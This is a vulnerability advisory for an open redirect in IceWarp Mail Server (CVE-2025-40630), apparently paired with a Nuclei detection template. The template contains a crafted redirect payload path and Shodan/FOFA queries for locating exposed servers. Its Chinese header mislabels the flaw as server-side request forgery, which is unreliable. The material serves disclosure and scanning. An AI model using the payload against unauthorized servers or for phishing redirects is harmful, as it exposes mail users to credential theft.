漏洞名称: IceWarp Mail Server Open Redirect Vulnerability
漏洞编号:
CVE: CVE-2025-40630
漏洞类型: 服务器端请求伪造
漏洞等级: 中危
漏洞描述: IceWarp Mail Server是一款广泛使用的邮件服务器软件,适用于企业级邮件服务部署,支持多种邮件协议和功能,如SMTP、POP3、IMAP等,常用于企业通信系统中。该软件在11.4.0及以下版本中存在一个开放重定向漏洞,攻击者可以通过构造恶意的URL,将用户重定向到任意外部域名。此漏洞的技术根源在于服务器未对重定向URL进行充分的验证和限制,导致攻击者可以利用特定的URL构造方式绕过安全措施。这种漏洞可能导致用户被诱导访问恶意网站,进而遭受钓鱼攻击或凭证窃取等安全威胁。由于攻击者无需认证即可利用此漏洞,且可以自动化执行,因此对用户构成了中等级别的安全风险。
产品厂商: icewarp
产品名称: mail_server
影响版本: version <= 11.4.0
搜索语法: http.title:”IceWarp” OR title=”IceWarp” OR intitle:”icewarp”
info: name: IceWarp Mail Server ≤11.4.0- Open Redirect author: DhiyaneshDK severity: medium description: | IceWarp Mail Server version 11.4.0 and below contains an open redirect vulnerability that allows attackers to redirect users to arbitrary external domains through malicious URLs. impact: | An attacker can craft malicious URLs to redirect users to external malicious websites, potentially leading to phishing attacks or credential theft. remediation: | Update IceWarp Mail Server to a version newer than 11.4.0. Implement proper URL validation and restrict redirects to trusted domains only. reference: - https://nvd.nist.gov/vuln/detail/CVE-2025-40630 - https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-icewarp-mail-server classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score:6.1 cve-id: CVE-2025-40630 cwe-id: CWE-601 epss-score:0.00059 epss-percentile:0.18581 cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:* metadata: verified:true max-request:1 vendor: icewarp product: mail_server shodan-query: 'http.title:"IceWarp"' fofa-query: 'title="IceWarp"' google-query: intitle:"icewarp" tags: cve,cve2025,icewarp,redirect,open-redirect
http: -method: GET path: -"{{BaseURL}}/%2f%5c%2foast.pro%2f.."
matchers-condition: and matchers: -type: regex part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$'